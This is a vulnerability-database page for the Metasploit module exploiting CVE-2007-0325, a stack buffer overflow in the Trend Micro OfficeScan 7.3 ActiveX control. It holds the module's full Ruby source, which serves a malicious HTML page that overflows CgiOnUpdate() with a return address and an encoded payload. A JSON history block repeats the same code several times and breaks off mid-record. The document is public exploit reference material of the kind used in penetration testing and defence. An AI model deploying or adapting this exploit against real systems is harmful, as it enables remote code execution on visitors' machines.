Search...

Trend Micro OfficeScan Client ActiveX Control Buffer Overflow

2007-08-31T11:58:31

ID MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the "CgiOnUpdate()" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',
      'Description'    =&gt; %q{
          This module exploits a stack buffer overflow in Trend Micro OfficeScan
        Corporate Edition 7.3. By sending an overly long string to the
        "CgiOnUpdate()" method located in the OfficeScanSetupINI.dll Control,
        an attacker may be able to execute arbitrary code.
      },
      'License'        =&gt; MSF_LICENSE,
      'Author'         =&gt; [ 'MC' ],
      'References'     =&gt;
        [
          [ 'CVE', '2007-0325' ],
          [ 'OSVDB', '33040' ],
          [ 'BID', '22585' ],
        ],
      'DefaultOptions' =&gt;
        {
          'EXITFUNC' =&gt; 'process',
        },
      'Payload'        =&gt;
        {
          'Space'         =&gt; 800,
          'BadChars'      =&gt; "\x00\x09\x0a\x0d'\\",
          'StackAdjustment' =&gt; -3500,
        },
      'Platform'       =&gt; 'win',
      'Targets'        =&gt;
        [
          [ 'Windows XP SP2 Pro English',     { 'Ret' =&gt; 0x7cc58fd8 } ],
        ],
      'DisclosureDate' =&gt; 'Feb 12 2007',
      'DefaultTarget'  =&gt; 0))
  end

  def autofilter
      false
  end

  def check_dependencies
      use_zlib
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    # Randomize some things
    vname	= rand_text_alpha(rand(100) + 1)
    strname	= rand_text_alpha(rand(100) + 1)

    # Set the exploit buffer
    sploit =  rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded

    # Build out the message
    content = %Q|
      &lt;html&gt;
      &lt;object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'&gt;&lt;/object&gt;
      &lt;script language='javascript'&gt;
      var #{vname} = document.getElementById('#{vname}');
      var #{strname} = new String('#{sploit}');
      #{vname}.CgiOnUpdate = #{strname};
      &lt;/script&gt;
      &lt;/html&gt;
      |

    print_status("Sending #{self.name}")

    # Transmit the response to the client
    send_response_html(cli, content)

    # Handle the payload
    handler(cli)
  end
end

JSON Vulners Source

Initial Source

{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "b4243b7b328c997897fc12de44250db5", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2018-10-26T21:54:08", "history": [{"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-05-03T20:42:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/trendmicro_officescan", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/22585", "http://cvedetails.com/cve/cve-2007-0325"], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-07-02T23:53:47", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-07-02T23:53:47", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/trendmicro_officescan", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/22585", "http://cvedetails.com/cve/cve-2007-0325"], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-07-24T19:26:38", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-07-24T19:26:38", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-08-21T15:31:38", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-08-21T15:31:38", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-10-19T21:39:23", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-10-19T21:39:23", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-10-19T23:42:53", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-10-19T23:42:53", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-10-24T04:36:13", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-10-24T04:36:13", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "2007-08-31T11:58:31", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-10-24T07:40:48", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some things\n vname\t= rand_text_alpha(rand(100) + 1)\n strname\t= rand_text_alpha(rand(100) + 1)\n\n # Set the exploit buffer\n sploit = rand_text_alpha(2149) + [target.ret].pack('V') + p.encoded\n\n # Build out the message\n content = %Q|\n <html>\n <object classid='clsid:08d75bb0-d2b5-11d1-88fc-0080c859833b' id='#{vname}'></object>\n <script language='javascript'>\n var #{vname} = document.getElementById('#{vname}');\n var #{strname} = new String('#{sploit}');\n #{vname}.CgiOnUpdate = #{strname};\n </script>\n </html>\n |\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/trendmicro_officescan.rb"}, "lastseen": "2017-10-24T07:40:48", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/TRENDMICRO_OFFICESCAN", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan Corporate Edition 7.3. By sending an overly long string to the \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control, an attacker may be able to execute arbitrary code.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2007-0325"], "lastseen": "2017-10-30T21:38:41", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/trendmicro_officescan.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trend Micro OfficeScan Client ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-0325' ],\n [ 'OSVDB', '33040' ],\n [ 'BID', '22585' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 800,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP2 Pro English', { 'Ret' => 0x7cc58fd8 } ],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Randomize some 